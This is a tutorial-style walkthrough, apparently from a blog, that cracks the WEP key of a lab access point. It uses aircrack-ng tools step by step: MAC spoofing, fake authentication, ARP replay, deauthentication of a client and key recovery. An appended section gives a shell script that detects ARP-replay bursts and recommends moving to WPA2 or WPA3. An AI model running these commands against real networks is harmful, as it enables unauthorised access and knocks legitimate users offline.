Our information -
Wireless interface: wlan0
Monitor mode interface: mon0
Spoofed MAC: 00:11:22:33:44:55
→ DO NOT EVER USE THIS AS YOUR SPOOFED MAC ADDRESS OUTSIDE A CLOSED TESTING ENVIRONMENT!

Target AP information -
ESSID: pelican
BSSID: 00:0F:66:39:7B:BD
CH: 6
STA: 00:22:FA:29:FA:58

Attack Setup
Spoof the MAC address of your wireless interface, enable monitor mode, then spoof the monitor interface's MAC address as well.
# ifconfig wlan0 down
# macchanger -m 00:11:22:33:44:55 wlan0
# ifconfig wlan0 up
# airmon-ng start wlan0
# ifconfig mon0 down
# macchanger -m 00:11:22:33:44:55 mon0
# ifconfig mon0 up

Find your target
# airodump-ng mon0
→ Let run until target AP has been found, then stop.
Reconfigure your monitor mode to match the target's channel and re-spoof the MAC address.
# airmon-ng stop mon0
# airmon-ng start wlan0 6
# ifconfig mon0 down
# macchanger -m 00:11:22:33:44:55 mon0
# ifconfig mon0 up

Begin the Attack
# airodump-ng -c 6 --bssid 00:0F:66:39:7B:BD -w key mon0
→ Let run.
Perform a Fake Authentication attack to associate with the AP. Open a new terminal.
# aireplay-ng -1 0 -e pelican -a 00:0F:66:39:7B:BD -h 00:11:22:33:44:55 mon0
Begin the ARP Replay attack. Open a new terminal.
# aireplay-ng -3 -b 00:0F:66:39:7B:BD -h 00:22:FA:29:FA:58 mon0
→ Let run.
De-authenticate the connected STA. Open a new terminal.
# aireplay-ng -0 1 -a 00:0F:66:39:7B:BD -c 00:22:FA:29:FA:58 mon0
→ Harvest IVs.

Crack the Encryption
Open a new terminal.
# aircrack-ng key*.cap; killall aireplay-ng airodump-ng
KEY FOUND! [ 01:23:45:67:89 ]
The WEP network security key to "pelican" is "0123456789".
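
Seen from the side of whoever runs the access point, the steps above leave a recognisable trace: an authentication from an unfamiliar MAC, a deauthentication, then one station transmitting ARP frames at a rate no real client produces. The detection logic below is an added example, not part of the original article; the one-line-per-frame log format, the function names and the threshold of 50 ARP frames per second are assumptions.

```shell
#!/bin/sh
# Constructed sample, one frame per line: "second kind transmitter bssid".
# The log format is hypothetical; the MACs are the lab values from the walkthrough.
AP=00:0F:66:39:7B:BD
STA=00:22:FA:29:FA:58

sample_frames() {
    echo "100 auth 00:11:22:33:44:55 $AP"   # fake authentication from the spoofed MAC
    echo "101 arp $STA $AP"                 # ordinary client ARP
    echo "104 deauth $AP $AP"               # deauthentication aimed at the STA
    i=0
    while [ "$i" -lt 300 ]; do              # replayed ARP request: 300 frames in one second
        echo "105 arp $STA $AP"
        i=$((i + 1))
    done
    echo "106 arp 00:AA:BB:CC:DD:01 $AP"    # unrelated client at a normal rate
}

# detect_arp_replay MAX: read frames on stdin and print one alert the first time
# a transmitter exceeds MAX ARP frames within a single second on a BSSID.
# The alert also reports how many auth/deauth frames that BSSID saw beforehand.
detect_arp_replay() {
    awk -v max="$1" '
        $2 == "deauth" { deauth[$4]++ }
        $2 == "auth"   { auth[$4]++ }
        $2 == "arp" {
            key = $3 SUBSEP $4 SUBSEP $1
            if (++n[key] == max + 1)
                printf "ALERT arp-burst sta=%s bssid=%s t=%s deauth_before=%d auth_before=%d\n", $3, $4, $1, deauth[$4], auth[$4]
        }'
}

sample_frames | detect_arp_replay 50
```

The lasting fix is to retire WEP on the network in favour of WPA2 or WPA3; rate-based alerts like this one only shorten the time to notice.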

Original article: http://www.cnblogs.com/alex-wood/p/3779669.html